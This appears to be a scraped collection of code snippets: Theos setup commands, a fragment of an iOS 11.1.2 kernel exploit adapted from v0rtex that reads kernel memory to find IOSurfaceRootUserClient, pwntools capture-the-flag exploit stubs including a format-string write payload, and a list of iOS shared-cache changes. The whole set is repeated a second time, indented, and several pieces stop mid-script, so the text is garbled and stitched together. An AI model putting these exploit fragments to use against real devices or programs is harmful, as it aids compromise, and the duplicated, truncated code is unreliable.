George Dan ninjaprawn

## installing theos
brew install dpkg ldid
cd ~
git clone --recursive https://github.com/theos/theos.git
echo "export THEOS=~/theos" >> .bash_profile

## slide.c
/*
Offsets from iOS 11.1.2 iPhone 6+
Insert the following after line 680 in async_wait.c
Mostly from Siguza's v0rtex
*/

mach_ports_register(mach_task_self(), &user_client, 1);
uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list
uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr);

## exp_fat_morphine.py
from pwn import *

bin_path = "./fat_morphine"

payload = ""
payload += "%4196134x" # What we are writing
payload += "%{}$lln" # How we write it
payload += "\x30\x0d\x60" # Where we write it
payload = payload.format(10)

## dsc_changes
Added:
- /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer
- /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices
- /System/Library/Frameworks/CarPlay.framework/CarPlay
- /System/Library/Frameworks/CoreServices.framework/CoreServices
- /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib
- /System/Library/Frameworks/GLKit.framework/GLKit
- /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI
- /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector
- /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage

## exp_neo_boffy.py
from pwn import *

bin_path = "./neo_boffy"

# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
context(log_level="ERROR")

# Can't send NULLs, but can send empty strings
def cmdify(str): return str.split("\x00")
	brew install dpkg ldid
	cd ~
	git clone --recursive https://github.com/theos/theos.git
	echo "export THEOS=~/theos" >> .bash_profile
	/*
	Offsets from iOS 11.1.2 iPhone 6+
	Insert the following after line 680 in async_wait.c
	Mostly from Siguza's v0rtex
	*/

	mach_ports_register(mach_task_self(), &user_client, 1);
	uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list
	uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
	uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr);
	from pwn import *

	bin_path = "./fat_morphine"

	payload = ""
	payload += "%4196134x" # What we are writing
	payload += "%{}$lln" # How we write it
	payload += "\x30\x0d\x60" # Where we write it
	payload = payload.format(10)
	Added:
	- /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer
	- /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices
	- /System/Library/Frameworks/CarPlay.framework/CarPlay
	- /System/Library/Frameworks/CoreServices.framework/CoreServices
	- /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib
	- /System/Library/Frameworks/GLKit.framework/GLKit
	- /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI
	- /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector
	- /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage
	from pwn import *

	bin_path = "./neo_boffy"

	# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
	context(log_level="ERROR")

	# Can't send NULLs, but can send empty strings
	def cmdify(str): return str.split("\x00")